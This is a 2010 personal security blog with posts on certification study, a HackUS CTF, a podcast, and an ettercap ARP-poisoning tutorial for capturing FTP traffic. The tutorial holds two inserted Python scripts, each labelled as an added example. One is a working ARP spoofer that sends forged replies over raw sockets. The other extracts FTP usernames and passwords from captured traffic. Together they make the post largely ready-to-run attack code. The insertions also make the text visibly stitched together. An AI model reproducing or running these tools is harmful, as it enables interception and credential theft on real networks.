2010
05.23

Well, it’s been over a month since I’ve posted anything here. Family life, work and studies have taken up most of my time. Once my daily chores are completed I no longer have the energy to stay in front of the computer.  Recently I’ve been studying the MCTS for Exchange 2007.  Taking the exam in early June. I’m also starting Offsec’s second course, CTP, and hoping to eventually add the OSCE next to the OSCP.  Should be a tough one, but if I play my cards right all should be well.

I’m still testing for exploit-db, and keeping current (as much as I can) with all things ‘infosec’, but it’s difficult these days.  Summer means family outings, clean-up and a different work load at my current place of employment.  Rest assured, I will still be working on updating this blog… So all 2 of you reading will be fine ;)

With CTP coming soon, I’ll need a place to write up my notes.  Same way I did for PWB (formerly OffSec101), so lots of interesting snippets coming.  The VM project is on hold unfortunately.  Seeing I needed to switch to Hyper-V for work purposes, it’s difficult at the moment.

Other news, Hackfest.ca has released its pre-sales information for the upcoming convention in November. You can check them out here.  I’ll be attending for both days of course.

Have a good one people, wish me luck…

2010
04.05

This past weekend’s CTF event, hosted at Sherbrooke University and organized by the crew of HackUS.org, was a complete success in my opinion. From the warm (and unexpected) welcome, right down to the ambiance and food provided. This being my first ever participation in this type of event, I must say I wasn’t disappointed at all.

The battle ground HackUS provided us was exceptionally well made. All teams had lots of room to set up shop; we had meals provided for us during the whole event. Alcoholic beverages were available. As a whole, these guys organized one hell of a party. We had the standard CTF event, a Web CTF, some trivia/crypto puzzles to solve and web level-ups. Some reverse engineering, a botnet to analyze and in the end even a game of open-arena… It had everything for everyone. No complaints; nothing more was needed.

As for our performance, well, we didn’t fare too well compared to the other teams. 10 teams participated, and we finished 9th overall. Still not bad for 2 guys looking to score at least 1 point… We got 60 in the end. I even got a bonus gift… An $85 ticket for smoking near a public building.

Day 1:

We arrive at the hotel in Sherbrooke at around 15h00. After the 2-hour drive, a well-deserved shower is taken.
Then I decide to warm up for the upcoming activities.

All started with registration and the warm welcome (which gave me performance anxiety) from the HackUS crew. We were led to our table and then started to plug-in our gear. Seeing this was our first time at such an event we may have brought too much gear.

We’re given instructions on how things work, and we’re let loose on the network…
I of course, get another beer.

Day 2:

After 4 hours of sleep, I drag my skinny a** out of bed and head back to face the war zone once more. After taking a wrong turn on the highway, I eventually got to the Sherbrooke University campus.  Got a few points, talked to some great people, and had more beer.

Day 3:

This one was rough. After two days away from home, I was starting to miss my own bed and pillow. We got a few more points in, but by this time we were out of ideas and stuck in 9th place.

Around 15h00 that afternoon, it was the end. Prizes were given out, pictures were taken and hands were shaken. All of this with the presence of beer.

So as a whole, this weekend was great. We now know what such an event looks and feels like. We’ll be better prepared for next year’s HackUS CTF.
Good job guys. You guys should be proud.

2010
04.02

Odds are this topic has been blogged to death already, but sometimes I need to write things down so as not to forget them. Also, there are times when the command line is the only option. Then again, in my opinion, one should start with the command line and only then move on to GUI applications.

Ettercap is a tool for network protocol analysis and security auditing. It’s capable of intercepting traffic, capturing credentials and conducting active “eavesdropping” against a number of common protocols. If you wish to know more, Google “Ettercap” and you’ll find lots of links about this tool.

Using Ettercap is a quicker and easier alternative to doing the ARP poisoning by hand. Note that the “arp” command only shows and edits your own machine’s cache; to poison a remote host you have to craft and send forged ARP replies yourself, so that the target’s traffic is redirected to your own network adapter, and enable IP forwarding so those packets are passed on to their original destination. Again, it’s always good to understand the manual approach, seeing that every situation is different and Ettercap may not always be available.

Imagine a simple scenario: Computer A, on the local LAN, connects to Computer B using the FTP protocol to retrieve a file. Our goal is to sniff the traffic between these two computers and retrieve either the username and password, or the file being transferred over FTP. To accomplish this we need to “ARP cache poison” our victim’s machine, so as to redirect its traffic to our machine, sniff the traffic and then send it on to its original destination. Of course, let us assume this is in a switched environment: on a hub we would see the traffic anyway, but a switch only delivers frames to the port that owns the destination MAC address, which is why we have to make the victim send them to us. If you are unfamiliar with the concept of “ARP cache poisoning”, I suggest you look it up… I’ll provide links at the end of this blog to push you in the right direction.

The simplest way to do this with ettercap from the command line is:

ettercap -T -w dump -M arp /xx.xx.xx.xx/ //

Where ‘xx.xx.xx.xx’ is our target machine’s IP address.

This will poison the target’s ARP cache, replacing the MAC address it holds for the other hosts with our own, and at the same time poison the other hosts’ caches with our MAC for the target’s IP, so both directions of the conversation pass through us. Of course, this is a very basic example. There are far more complex and more precise usages of this command, which are beyond the scope of this blog entry.

Let us continue…

“-T” runs ettercap with the text-only interface (no curses or GTK GUI).

“-w dump” writes the captured packets, in pcap format, to a file called “dump”.

“-M arp” selects the man-in-the-middle method, in our case ARP poisoning. The switch takes the form METHOD:ARGS; “-M arp:remote” is what you need when the second target is the gateway and you also want the traffic the victim sends to hosts beyond it.

“/xx.xx.xx.xx/ //” are the two target groups, each written as MAC/IPs/PORTs. The first is our victim; the second, “//”, means every host ettercap finds on the LAN. Notice I have not entered any ports, so we’ll just grab everything. For the FTP scenario above, “/A/ /B/” is more precise: only the two machines involved get poisoned, which is a lot quieter on the wire than announcing our MAC for the victim’s IP to the whole segment.

There is no “output” argument; everything ettercap sees is simply printed on the screen. A “-q” (or “-Tq”) would have provided less information on the monitor, but I always choose to see as much as possible.

Hit “enter” and ettercap will scan the network, poison the targets and start doing our bidding. Leave kernel IP forwarding disabled on your own machine while it runs: ettercap forwards the intercepted packets itself, and if the kernel forwards them as well every packet goes out twice. Let it run for as long as you wish. Once you feel you have gathered enough, hit the “q” key and ettercap will send out the correct ARP entries again, returning our target’s ARP cache to its original state.
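To make the poisoning and the clean-up concrete, here is what actually goes on the wire. This is an added example, not code from the original post or from the ettercap project: it builds the forged ARP replies that “-M arp” sends for a /victim/ /server/ target pair (“server X is at our MAC” to the victim, and “victim A is at our MAC” to the server), plus the corrective replies sent on quit, using only Python’s standard library. The MAC and IP addresses are made up for the illustration, and send_frames() is the one piece that needs Linux and root.

```python
"""Forged ARP replies for cache poisoning, and the replies that undo it.

Added example (not from the original post). Addresses below are constructed.
Wire layout: Ethernet (dst 6, src 6, type 2) then ARP (htype 2, ptype 2,
hlen 1, plen 1, oper 2, sha 6, spa 4, tha 6, tpa 4) = 42 bytes.
"""
import socket
import struct

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Unsolicited ARP reply 'sender_ip is at sender_mac', unicast to the target.

    The target's kernel updates its cache entry for sender_ip on receipt; this is
    the whole attack. Entries expire, so a real tool re-sends every few seconds."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)  # Ethernet, IPv4, 6, 4, reply
    arp += mac_bytes(sender_mac) + socket.inet_aton(sender_ip)
    arp += mac_bytes(target_mac) + socket.inet_aton(target_ip)
    return eth + arp


def parse_arp(frame):
    """Decode a frame built by arp_reply back into a dict (to check what we built)."""
    _htype, _ptype, _hlen, _plen, oper = struct.unpack("!HHBBH", frame[14:22])
    sha, spa, tha, tpa = frame[22:28], frame[28:32], frame[32:38], frame[38:42]
    return {"oper": oper,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def poison_frames(attacker_mac, victim_mac, victim_ip, server_mac, server_ip):
    """Both directions, like ettercap -M arp with /victim/ /server/: the victim is told
    the server lives at our MAC, and the server is told the victim lives at our MAC."""
    return [arp_reply(attacker_mac, server_ip, victim_mac, victim_ip),
            arp_reply(attacker_mac, victim_ip, server_mac, server_ip)]


def restore_frames(victim_mac, victim_ip, server_mac, server_ip):
    """The corrective replies sent when we quit: real MACs, so traffic stops flowing
    through us instead of breaking when our box disappears."""
    return [arp_reply(server_mac, server_ip, victim_mac, victim_ip),
            arp_reply(victim_mac, victim_ip, server_mac, server_ip)]


def send_frames(iface, frames):
    """Put the frames on the wire. Linux only (AF_PACKET) and needs root. When poisoning
    by hand the kernel must forward (sysctl net.ipv4.ip_forward=1), or the victim's
    connections simply die instead of passing through us."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        for f in frames:
            s.send(f)


if __name__ == "__main__":
    # Constructed addresses: attacker, victim A, server B.
    frames = poison_frames("00:0c:29:aa:aa:aa",
                           "00:0c:29:bb:bb:bb", "192.168.1.10",
                           "00:0c:29:cc:cc:cc", "192.168.1.20")
    for f in frames:
        print(parse_arp(f))
```

Run as root with send_frames("eth0", frames) in a loop and the victim’s FTP session to B starts arriving at your interface; send restore_frames() before you leave, which is exactly what pressing “q” in ettercap does for you.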

Now all you need to do is analyze the dump file. Since “-w” writes standard pcap, Wireshark opens it directly (renaming it to “dump.pcap” only gets the file association right). “etterlog”, on the other hand, reads ettercap’s own log format, which you get by adding “-L logname” to the command line: that produces “logname.ecp” (the packets) and “logname.eci” (the collected infos, including any credentials ettercap recognized). Type “etterlog -h” and see all the wonderful options; it’s very complete.  Once you have your capture file, you can use tools such as chaosreader or NetworkMiner to retrieve the information, or you could do it manually in Wireshark with “Follow TCP Stream” on the port 21 connection.
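For the manual route, here is the analysis step done in code rather than by clicking through Wireshark. This is an added example, not from the original post or from any of the tools it names: it parses the classic pcap format that “-w dump” produces by hand (global header, per-record headers, Ethernet, IPv4, TCP), pulls USER/PASS out of every FTP control connection on port 21, and uses the server’s 230/530 replies to tell an accepted login from a rejected one. The capture it runs on is constructed inline; the addresses, names and password are invented.

```python
"""Extract FTP logins from a pcap such as the one ettercap -w writes.

Added example (not from the original post). Standard library only; the
sample capture at the bottom is constructed, not a real dump.
"""
import socket
import struct

PCAP_MAGIC = 0xA1B2C3D4
LINKTYPE_ETHERNET = 1


def pcap_records(data):
    """Yield the raw link-layer frames of a classic pcap file (either byte order)."""
    magic = struct.unpack("<I", data[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng needs a different parser)")
    if struct.unpack(endian + "I", data[20:24])[0] != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures are handled here")
    off = 24
    while off + 16 <= len(data):
        _sec, _usec, incl_len, _orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        yield data[off:off + incl_len]
        off += incl_len


def _ipv4_tcp(frame):
    """Return (src_ip, dst_ip, sport, dport, payload), or None if not IPv4/TCP."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    if ip[9] != 6 or len(ip) < ihl + 20:
        return None
    src, dst = socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20])
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4
    return src, dst, sport, dport, tcp[doff:]


def extract_ftp_logins(data, ftp_port=21):
    """One dict per FTP control connection: client, server, user, password, accepted."""
    sessions = {}
    for frame in pcap_records(data):
        parsed = _ipv4_tcp(frame)
        if parsed is None:
            continue
        src, dst, sport, dport, payload = parsed
        if dport == ftp_port:  # client -> server: commands
            s = sessions.setdefault((src, sport, dst), {"client": src, "server": dst,
                                                        "user": None, "password": None,
                                                        "accepted": None})
            for line in payload.decode("latin-1").splitlines():
                verb, _, arg = line.partition(" ")
                if verb.upper() == "USER":
                    s["user"] = arg
                elif verb.upper() == "PASS":
                    s["password"] = arg
        elif sport == ftp_port:  # server -> client: replies (230 = logged in, 530 = rejected)
            s = sessions.get((dst, dport, src))
            if s is None:
                continue
            for line in payload.decode("latin-1").splitlines():
                if line.startswith("230"):
                    s["accepted"] = True
                elif line.startswith("530"):
                    s["accepted"] = False
    return list(sessions.values())


def extract_ftp_logins_from_file(path):
    with open(path, "rb") as f:
        return extract_ftp_logins(f.read())


def _frame(src_ip, dst_ip, sport, dport, payload):
    """Ethernet/IPv4/TCP frame for the constructed sample (checksums left zero)."""
    eth = bytes.fromhex("000c29aabbcc") + bytes.fromhex("000c29ddeeff") + b"\x08\x00"
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp


def sample_pcap():
    """Constructed capture: A logs into B, one rejected attempt then an accepted one."""
    a, b = "192.168.1.10", "192.168.1.20"
    frames = [_frame(b, a, 21, 40001, b"220 FTP server ready.\r\n"),
              _frame(a, b, 40001, 21, b"USER john\r\n"),
              _frame(b, a, 21, 40001, b"331 Please specify the password.\r\n"),
              _frame(a, b, 40001, 21, b"PASS wrongpass\r\n"),
              _frame(b, a, 21, 40001, b"530 Login incorrect.\r\n"),
              _frame(a, b, 40002, 21, b"USER john\r\n"),
              _frame(a, b, 40002, 21, b"PASS s3cret\r\n"),
              _frame(b, a, 21, 40002, b"230 Login successful.\r\n")]
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", 1270000000 + i, 0, len(f), len(f)) + f
    return out


if __name__ == "__main__":
    for login in extract_ftp_logins(sample_pcap()):
        print(login)
```

Point extract_ftp_logins_from_file() at the “dump” file from the ettercap run and you get the same list; the accepted flag matters because a poisoned session records every attempt, typos included.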

Later on, I may just post something about filters and more “advanced” methods. For now this will have to do. All the information is already on the Internet, and is readily available for anyone that takes the time to search and read.

On another note, we at Kioptrix.com are leaving for the HackUS.org CTF event this weekend. I’ll report back next week. Also don’t forget that Hackfest.ca is accepting papers for the convention being held in November of this year (2010) in Quebec City, Canada. Kioptrix should come out with episode 3 of our monthly podcast (French only) a week or so after the CTF in Sherbrooke. New VM images are soon to be released (hint). Should be out within the next 2 weeks.

http://ettercap.sourceforge.net/

http://en.wikipedia.org/wiki/Ettercap_%28computing%29

http://en.wikipedia.org/wiki/ARP_spoofing

http://networkminer.sourceforge.net/

Hope you enjoyed the read.

2010
03.23

Well, it’s been in the making for a while. Due to certain events and health issues we’ve had trouble being consistent. Good for us, we’ve been able to work on our pet project: an all-French-language podcast :)
Loosely styled around PaulDotCom Security Weekly’s format, we try to inform and give out bits of information to people. We also try to entertain, but remember we are not professionals at this. No spoon feeding, you won’t learn to hack, penetrate or compromise systems, but you will learn basic information and where to start if you’re interested.

So far, we have 2 episodes available for download on iTunes, or direct links from our site.
Episode 1: We introduce ourselves, talk a bit about the Sulley Framework
Episode 2: Quick talk on Internet Explorer, Snort and Airdrop-ng
Here’s the RSS feed if you wish.

Keep in mind we’re new at this, and will try to come out with new episodes once every 3 weeks to a month.

Also as a reminder, HackUS’s CTF is very close so check them out and get registered.
Hackfest.ca 2010’s call for papers is also open, so if you’re interested or have something to say drop them an email.

Hope you enjoy the podcast,
Have a good one.

2010
03.13

Well, it’s almost time for Sherbrooke University’s CTF. You can get all the information at the HackUS.org site.
Everyone from Kioptrix.com will be participating…yes all 2 of us.

This 3-day event will be my first CTF experience. Should be interesting to see how my new-ish skills stack up to more seasoned and experienced computer geeks. Although I don’t consider myself a “hacker”, I expect we’ll do poorly compared to other teams. For example, the team from the Universite de Quebec a Montreal (UQAM) took first place at Hackfest.ca‘s CTF last November. I don’t expect to even come close to these guys. Our goal? 1 point… at least.

Nothing really security related in this post, just wanted to inform whoever is reading this that we’ll be reporting back from HackUS with a nice play-by-play of the CTF.

Remember to visit those sites I mentioned above, and also kioptrix.com

Have a good one,
LF